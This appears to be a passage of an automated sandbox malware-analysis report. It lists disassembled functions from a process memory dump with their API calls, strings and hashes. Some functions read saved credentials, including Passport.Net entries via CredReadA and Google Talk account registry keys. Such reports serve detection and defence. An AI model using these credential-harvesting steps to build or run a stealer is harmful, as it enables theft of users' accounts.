                                                                                                                control_flow_graph 374 40f6e2-40f70a call 40466b call 4045db 379 40f710-40f717 call 404734 374->379 380 40f7e9-40f801 call 404656 call 404785 374->380 379->380 385 40f71d-40f72e CredReadA 379->385 385->380 388 40f734-40f73a 385->388 389 40f740-40f743 388->389 390 40f7e5 388->390 389->390 391 40f749-40f759 389->391 390->380 392 40f75a-40f770 391->392 392->392 393 40f772-40f795 call 4047a5 392->393 396 40f7e2 393->396 397 40f797-40f7b6 WideCharToMultiByte 393->397 396->390 398 40f7b8-40f7c6 strlen 397->398 399 40f7d9-40f7dc LocalFree 397->399 398->399 400 40f7c8-40f7d8 _mbscpy 398->400 399->396 400->399
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                  • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                • CredReadA.ADVAPI32(Passport.Net\*,00000004,00000000,?,?,00000000), ref: 0040F729
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                                • strlen.MSVCRT ref: 0040F7BE
                                                                                                                • _mbscpy.MSVCRT ref: 0040F7CF
                                                                                                                • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharCredFreeLocalMultiReadWidestrlen
                                                                                                                • String ID: Passport.Net\*
                                                                                                                • API String ID: 4000595657-3671122194
                                                                                                                • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                                                • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                                                • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                                                • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 401 40ccd7-40cd06 ??2@YAPAXI@Z 402 40cd08-40cd0d 401->402 403 40cd0f 401->403 404 40cd11-40cd24 ??2@YAPAXI@Z 402->404 403->404 405 40cd26-40cd2d call 404025 404->405 406 40cd2f 404->406 408 40cd31-40cd57 405->408 406->408 410 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 408->410 411 40cd59-40cd60 DeleteObject 408->411 411->410
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2054149589-0
                                                                                                                • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                                                                                • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                                • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                                                                                • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004085D2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                                  • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                  • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                                  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                • memset.MSVCRT ref: 00408620
                                                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                • memset.MSVCRT ref: 00408671
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                                                Strings
                                                                                                                • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                                                • String ID: Software\Google\Google Talk\Accounts
                                                                                                                • API String ID: 1366857005-1079885057
                                                                                                                • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                                                • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                                • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                                                • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 441 40ba28-40ba3a 442 40ba87-40ba9b call 406c62 441->442 443 40ba3c-40ba52 call 407e20 _mbsicmp 441->443 465 40ba9d call 4107f1 442->465 466 40ba9d call 404734 442->466 467 40ba9d call 404785 442->467 468 40ba9d call 403c16 442->468 469 40ba9d call 410a9c 442->469 448 40ba54-40ba6d call 407e20 443->448 449 40ba7b-40ba85 443->449 455 40ba74 448->455 456 40ba6f-40ba72 448->456 449->442 449->443 451 40baa0-40bab3 call 407e30 457 40bab5-40bac1 451->457 458 40bafa-40bb09 SetCursor 451->458 459 40ba75-40ba76 call 40b5e5 455->459 456->459 460 40bac3-40bace 457->460 461 40bad8-40baf7 qsort 457->461 459->449 460->461 461->458 465->451 466->451 467->451 468->451 469->451
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Cursor_mbsicmpqsort
                                                                                                                • String ID: /nosort$/sort
                                                                                                                • API String ID: 882979914-1578091866
                                                                                                                • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                                • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                                • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                                • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00410DBB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                                                                  • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                • memset.MSVCRT ref: 00410E10
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                • _mbscpy.MSVCRT ref: 00410E87
                                                                                                                  • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                Strings
                                                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                • API String ID: 889583718-2036018995
                                                                                                                • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                                                • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                                • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                                                • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00410C68 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                                • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                                • String ID:
                                                                                                                • API String ID: 3473537107-0
                                                                                                                • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                                                • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004109F7
                                                                                                                  • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                                  • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                                                                                                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                                • memset.MSVCRT ref: 00410A32
                                                                                                                • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 3143880245-0
                                                                                                                • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                                • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                                • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                                • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00408D34 Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@
                                                                                                                • String ID:
                                                                                                                • API String ID: 1033339047-0
                                                                                                                • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                                                • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406F30 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@mallocmemcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3831604043-0
                                                                                                                • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                                                                                • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                                                                • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                                                                                • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407088 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                  • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                                                                                                • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFontIndirect_mbscpymemset
                                                                                                                • String ID: Arial
                                                                                                                • API String ID: 3853255127-493054409
                                                                                                                • Opcode ID: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                                                                                                • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                                                                                • Opcode Fuzzy Hash: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                                                                                                • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0044B3CF Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 544645111-0
                                                                                                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                                                                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                                • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: strlen$_strcmpimemset
                                                                                                                • String ID: /stext
                                                                                                                • API String ID: 520177685-3817206916
                                                                                                                • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                                                • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                                • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                                                • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0044B40E Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 544645111-0
                                                                                                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                                                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0044B42B Relevance: 3.1, APIs: 2, Instructions: 54memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 544645111-0
                                                                                                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                                                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404734 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                                • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                • String ID:
                                                                                                                • API String ID: 145871493-0
                                                                                                                • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                                • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                                • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                                • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                                  • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                                  • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                                  • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 4165544737-0
                                                                                                                • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                                • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                                • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                                • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
